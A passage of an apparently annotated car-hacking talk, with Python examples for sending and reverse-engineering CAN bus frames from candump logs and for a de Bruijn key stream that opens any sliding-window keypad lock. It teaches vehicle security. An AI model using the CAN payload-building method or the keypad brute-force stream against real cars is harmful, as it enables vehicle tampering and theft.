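    sock = socket.socket(socket.AF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
    sock.bind((iface,))
    # Hypothetical frame: ID 0x27 with an "engine temperature" in byte 0.
    sock.send(pack_frame(0x27, bytes([0x5A, 0, 0, 0, 0, 0, 0, 0])))
    sock.settimeout(2.0)
    try:
        while True:
            frame = unpack_frame(sock.recv(CAN_FRAME_SIZE))
            print(iface, fmt_frame(frame))
    except socket.timeout:
        pass


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "vcan0")
```

Run `candump vcan0` in a second terminal to see the frame land; the same `pack_frame` output is what `cansend vcan0 027#5A` puts on the wire, so the two tools can be cross-checked against each other.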
26. The familiar Wireshark sees the CAN interface and happily logs every frame it catches. The problem is that the CAN bus is more specific than that.
27. Every CAN frame has an ID and data. The same data travels under the same ID. For example, if the first byte under ID 0x27 carries the engine temperature, then in this car it will always be transmitted under ID 0x27 in the first byte.
28. – Serious Anonymous
Have fun
The essence of reversing is working out which data travels under which IDs and using that information to build a payload.
29. – Serious Anonymous
Or not so much…
The process is very reminiscent of working with ArtMoney, just slightly less fun…
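An added example, not from the talk, of the ID-and-data reversing step from slides 27 to 29: a parser for the `candump -l` log format (`(timestamp) iface ID#DATA`), a per-ID profile of which byte positions ever change, and the ArtMoney-style diff between a baseline capture and one recorded while an action is performed. Both captures, their IDs and the meanings attached to them are constructed for this example and do not come from any real vehicle.

```python
"""Reverse-engineering CAN IDs from candump logs (added example, not the
workshop's code). The two captures below are constructed: a baseline
recorded with the car idle, and an action capture recorded while a
hypothetical button was pressed. IDs and meanings are invented.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^\((?P<ts>[\d.]+)\)\s+(?P<iface>\S+)\s+(?P<id>[0-9A-Fa-f]+)#(?P<data>[0-9A-Fa-f]*)$"
)

# Constructed baseline: ID 0x27 byte 0 drifts (temperature), 0x1A3 is static.
BASELINE_LOG = """\
(1553000000.000100) can0 027#5A00000000000000
(1553000000.010100) can0 1A3#0000000000000000
(1553000000.020100) can0 027#5B00000000000000
(1553000000.030100) can0 1A3#0000000000000000
(1553000000.040100) can0 027#5C00000000000000
"""

# Constructed action capture: a new ID 0x3E2 shows up and 0x1A3 byte 0 flips.
ACTION_LOG = """\
(1553000010.000100) can0 027#5C00000000000000
(1553000010.010100) can0 1A3#0000000000000000
(1553000010.015100) can0 3E2#01
(1553000010.020100) can0 027#5B00000000000000
(1553000010.030100) can0 1A3#0100000000000000
(1553000010.035100) can0 3E2#00
this line is garbage and must be skipped
"""


def parse_candump(text: str) -> list:
    """Parse candump -l lines into (timestamp, can_id, data) tuples.

    Non-matching lines are skipped rather than raising: logs taken from a
    noisy bus are rarely clean, and one bad line should not end the run.
    """
    frames = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        frames.append((float(m["ts"]), int(m["id"], 16), bytes.fromhex(m["data"])))
    return frames


def byte_profile(frames: list) -> dict:
    """For every ID, the sorted set of values seen at each byte position.

    A position with a single value is a constant (padding, or a signal the
    capture never exercised); one with several is a candidate signal, such
    as the temperature in byte 0 of ID 0x27.
    """
    profile = defaultdict(lambda: defaultdict(set))
    for _, can_id, data in frames:
        for pos, value in enumerate(data):
            profile[can_id][pos].add(value)
    return {cid: {pos: sorted(vals) for pos, vals in positions.items()}
            for cid, positions in profile.items()}


def changing_bytes(frames: list) -> dict:
    """Map ID -> list of byte positions whose value changes in the capture."""
    return {cid: [pos for pos, vals in positions.items() if len(vals) > 1]
            for cid, positions in byte_profile(frames).items()}


def diff_captures(baseline: list, action: list) -> dict:
    """ArtMoney-style narrowing: what is new when the action happens?

    Returns IDs that appear only in the action capture, plus byte values of
    shared IDs that were never seen in the baseline.
    """
    base, act = byte_profile(baseline), byte_profile(action)
    new_ids = sorted(set(act) - set(base))
    new_values = {}
    for cid in set(act) & set(base):
        novel = {pos: [v for v in vals if v not in base[cid].get(pos, [])]
                 for pos, vals in act[cid].items()}
        novel = {pos: vals for pos, vals in novel.items() if vals}
        if novel:
            new_values[cid] = novel
    return {"new_ids": new_ids, "new_values": new_values}


if __name__ == "__main__":
    base, act = parse_candump(BASELINE_LOG), parse_candump(ACTION_LOG)
    for cid, positions in sorted(changing_bytes(base).items()):
        print(f"ID {cid:03X}: changing bytes {positions}")
    print("diff:", diff_captures(base, act))
```

The diff is deliberately naive: a slowly drifting sensor (the temperature byte here) will show up as "novel" if the baseline is too short to have seen all its values, which is why the baseline should be captured for longer than the action and why a candidate ID is confirmed by replaying it with `cansend` and watching the car, not by the diff alone.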
31. Bonus: keypad hack
Ford cars can be found with keypad locks like this. Their peculiarity is that they check the code with a sliding window. In other words, if you type 12345 and the real code is 2345, the door will open.
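As an added example (not from the talk), the two checking strategies side by side: a lock that keeps the last N keypresses and opens as soon as they equal the code, which is the behaviour the slide describes, and an exact-entry lock that only compares complete, aligned attempts and locks out after repeated failures. The example goes one step beyond the slide: because every window is a valid attempt, a de Bruijn sequence over the keys covers all k^n codes in k^n + n - 1 presses instead of n·k^n, and the test walks such a sequence against the sliding-window lock. Key count, code length and the codes used are constructed for the example, not taken from Ford's keypads.

```python
"""Sliding-window keypad check vs. exact-entry check (added example, not from
the talk). The hardened variant and the de Bruijn walk are this example's own
additions; alphabet, code length and codes below are constructed.
"""
from collections import deque
from itertools import product


class SlidingWindowLock:
    """Opens whenever the most recent len(code) keypresses equal the code."""

    def __init__(self, code: str):
        self.code = code
        self.window = deque(maxlen=len(code))

    def press(self, key: str) -> bool:
        self.window.append(key)
        return "".join(self.window) == self.code


class ExactEntryLock:
    """Compares only complete, aligned attempts and locks out after too many."""

    def __init__(self, code: str, max_attempts: int = 5):
        self.code = code
        self.buffer = []
        self.failures = 0
        self.max_attempts = max_attempts

    def press(self, key: str) -> bool:
        if self.failures >= self.max_attempts:
            return False                       # locked out: input is ignored
        self.buffer.append(key)
        if len(self.buffer) < len(self.code):
            return False
        attempt, self.buffer = "".join(self.buffer), []   # consume the attempt
        if attempt == self.code:
            self.failures = 0
            return True
        self.failures += 1
        return False


def feed(lock, keys: str) -> int:
    """Type keys in order; return the 1-based press at which it opened, or 0."""
    for i, k in enumerate(keys, 1):
        if lock.press(k):
            return i
    return 0


def de_bruijn(alphabet: str, n: int) -> str:
    """de Bruijn sequence B(k, n): every length-n string over the alphabet
    occurs exactly once as a window of the cyclic sequence (FKM algorithm)."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq)


def brute_force_sequence(alphabet: str, n: int) -> str:
    """Linear key stream of length k^n + n - 1 that presents every n-digit
    code as a window, i.e. opens any sliding-window lock along the way."""
    s = de_bruijn(alphabet, n)
    return s + s[:n - 1]        # unwrap the cycle so the wrap-around windows exist


def opens_all_codes(alphabet: str, n: int) -> bool:
    """True if the brute-force stream opens a sliding-window lock for every code."""
    stream = brute_force_sequence(alphabet, n)
    return all(feed(SlidingWindowLock("".join(c)), stream)
               for c in product(alphabet, repeat=n))


if __name__ == "__main__":
    print("sliding window, code 2345, typed 12345:", feed(SlidingWindowLock("2345"), "12345"))
    print("exact entry,    code 2345, typed 12345:", feed(ExactEntryLock("2345"), "12345"))
    print("5 keys, 3 digits: stream length", len(brute_force_sequence("12345", 3)),
          "opens all:", opens_all_codes("12345", 3))
```

With the exact-entry lock every code costs a full n presses and the failure counter stops the walk long before it completes, so the de Bruijn shortcut only exists because the lock accepts a match at any alignment; the fix is the alignment, not a longer code.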